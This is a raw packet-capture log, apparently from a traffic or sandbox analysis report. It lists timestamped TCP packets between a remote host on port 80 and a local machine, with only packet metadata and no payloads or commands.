                                                                                                                                                            Feb 20, 2024 23:46:07.914113045 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.914125919 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.914139986 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.914158106 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.914165974 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.914208889 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.914208889 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.914223909 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.914294004 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.914350986 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.914393902 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.914469004 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.914505005 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.914515972 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.914536953 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.914617062 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.914618969 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.914741993 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.914756060 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.914787054 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.914839983 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.914860010 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.914875984 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.914892912 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.914897919 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.914916992 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.914920092 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.914953947 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.915106058 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915131092 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915185928 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915201902 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915216923 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.915230989 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915235043 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.915255070 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915267944 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915287018 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915306091 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915311098 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.915323973 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915332079 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.915380955 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915402889 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915410995 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.915420055 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915448904 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915468931 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.915468931 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915492058 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.915502071 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915545940 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.915550947 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915580988 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915594101 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915622950 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915651083 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.915676117 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915676117 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.915756941 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915793896 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915805101 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.915841103 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915853977 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915889978 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915923119 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.915941954 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.915976048 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.915998936 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.916053057 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.916218996 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.916312933 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.916364908 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.916369915 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.916384935 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.916464090 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.916467905 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.916480064 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.916493893 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.916539907 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.916552067 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.916564941 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.916610956 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.916626930 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.916675091 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.916704893 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.916718960 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.916774988 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.916785955 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.916800022 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.916817904 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.916847944 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.916850090 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.916889906 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.916960955 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.916997910 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.917047977 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.917053938 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.917068005 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.917081118 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.917109966 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.917114973 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.917126894 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.917154074 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.917157888 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.917197943 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.917227983 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.917242050 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.917260885 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.917275906 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.917282104 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.917294025 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.917341948 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.917349100 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.917391062 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.917431116 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.917480946 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.917525053 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.917555094 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.917577028 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.917607069 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.917638063 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.917659044 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.917670965 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.917680979 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.917740107 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.917758942 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.917788982 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.917870045 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.917918921 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.917946100 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.917958975 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918003082 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918009043 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.918021917 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918040037 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918056011 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918066025 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.918075085 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918116093 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.918155909 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918169975 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918183088 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918196917 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.918200970 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918226004 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.918231964 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918257952 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918279886 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.918311119 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918334961 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918350935 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918356895 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.918380022 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918392897 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918407917 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918425083 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918426991 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.918445110 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.918462038 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.918497086 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918574095 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918589115 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918631077 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.918636084 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918675900 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.918678999 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918704033 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918716908 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918766022 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.918766975 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918802023 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918814898 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918848991 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.918850899 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918869019 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.918874979 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918900967 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918912888 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.918917894 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918931007 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918943882 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918956995 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918972969 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.918987989 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.918992996 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919029951 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.919074059 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919086933 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919111967 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919123888 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.919142962 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919169903 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.919195890 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919212103 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919235945 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919265032 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.919270992 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919289112 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.919301987 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919348955 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919348955 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.919362068 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919373989 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919388056 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919415951 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.919449091 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.919461966 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919506073 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919580936 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919594049 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919636011 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919636011 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.919653893 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919667959 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.919693947 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.919711113 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919723988 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919735909 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919780016 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.919785023 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919797897 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919810057 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919843912 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.919872046 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.919878006 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919891119 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919903994 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919938087 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.919958115 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919970989 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919984102 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.919998884 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920016050 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920022964 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.920032024 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920056105 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.920056105 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.920067072 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920141935 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920175076 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920190096 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.920209885 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920216084 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.920228004 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920263052 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920290947 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920306921 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.920325994 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920330048 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.920363903 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920401096 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920433044 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920445919 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.920474052 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.920479059 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920494080 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920562029 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920609951 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920609951 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.920650005 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.920679092 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920764923 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920778990 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920809031 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.920838118 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920855045 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920886040 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.920905113 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920936108 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.920948029 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.920986891 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.921031952 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.921068907 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.921078920 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.921087027 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.921114922 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.921144962 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.921168089 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.921188116 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.921195984 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.921241999 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.921241999 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.921294928 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.921309948 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.921323061 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.921339035 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.921370029 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.921374083 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.921452999 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.921498060 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.921508074 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.921514988 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.921530008 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.921545029 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.921556950 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.921565056 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.921582937 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.921606064 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.921618938 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.921632051 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.921642065 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.921655893 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.921669006 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.921674967 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.921686888 CET80497195.101.153.86192.168.2.5
